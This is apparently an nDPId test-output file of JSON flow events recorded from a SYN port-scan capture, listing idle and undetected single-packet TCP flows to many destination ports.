-00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49157,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32773,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49158,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32774,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49158,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32775,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32774,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32775,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32776,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32776,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 